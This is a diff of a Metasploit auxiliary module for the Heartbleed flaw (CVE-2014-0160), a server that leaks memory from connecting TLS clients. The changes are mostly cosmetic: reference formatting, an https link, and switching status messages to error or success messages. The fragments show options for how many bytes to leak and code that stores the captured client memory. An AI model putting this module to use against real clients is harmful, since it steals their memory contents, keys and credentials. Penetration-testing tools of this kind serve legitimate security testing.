@@ -1,12 +1,9 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-
 class MetasploitModule < Msf::Auxiliary
-
   include Msf::Exploit::Remote::TcpServer
   include Msf::Auxiliary::Report
 
@@ -32,10 +29,11 @@ class MetasploitModule < Msf::Auxiliary
       'DefaultAction'  => 'Capture',
       'References'     =>
         [
-          ['CVE', '2014-0160'],
-          ['US-CERT-VU', '720951'],
-          ['URL', 'https://www.us-cert.gov/ncas/alerts/TA14-098A'],
-          ['URL', 'http://heartbleed.com/']
+          [ 'AKA', 'Heartbleed' ],
+          [ 'CVE', '2014-0160' ],
+          [ 'US-CERT-VU', '720951' ],
+          [ 'URL', 'https://www.us-cert.gov/ncas/alerts/TA14-098A' ],
+          [ 'URL', 'http://heartbleed.com/' ]
         ],
       'DisclosureDate' => 'Apr 07 2014'
     )
@@ -46,7 +44,7 @@ class MetasploitModule < Msf::Auxiliary
         OptInt.new('HEARTBEAT_LIMIT', [true, "The number of kilobytes of data to capture at most from each client", 512]),
         OptInt.new('HEARTBEAT_READ', [true, "The number of bytes to leak in the heartbeat response", 65535]),
         OptBool.new('NEGOTIATE_TLS', [true, "Set this to true to negotiate TLS and often leak more data at the cost of CA validation", false])
-      ], self.class)
+      ])
   end
 
   # Initialize the client state and RSA key for this session
@@ -223,7 +221,7 @@ class MetasploitModule < Msf::Auxiliary
 
     buff = decrypt_data(c, data[5, data.length-5])
     unless buff
-      print_status("#{@state[c][:name]} Failed to decrypt, giving up on this client")
+      print_error("#{@state[c][:name]} Failed to decrypt, giving up on this client")
       c.close
       return
     end
@@ -266,11 +264,11 @@ class MetasploitModule < Msf::Auxiliary
           nil,
           "OpenSSL Heartbleed client memory"
         )
-        print_status("#{@state[c][:name]} Heartbeat data stored in #{path}")
+        print_good("#{@state[c][:name]} Heartbeat data stored in #{path}")
       rescue ::Interrupt
         raise $!
       rescue ::Exception
-        print_status("#{@state[c][:name]} Heartbeat data could not be stored: #{$!.class} #{$!}")
+        print_error("#{@state[c][:name]} Heartbeat data could not be stored: #{$!.class} #{$!}")
       end
 
       # Report the memory disclosure as a vulnerability on the host
@@ -412,7 +410,7 @@ class MetasploitModule < Msf::Auxiliary
         return buff[0, buff.length-20]
       end
     rescue ::OpenSSL::Cipher::CipherError => e
-      print_status("#{@state[c][:name]} Decryption failed: #{e}")
+      print_error("#{@state[c][:name]} Decryption failed: #{e}")
     end
 
     nil
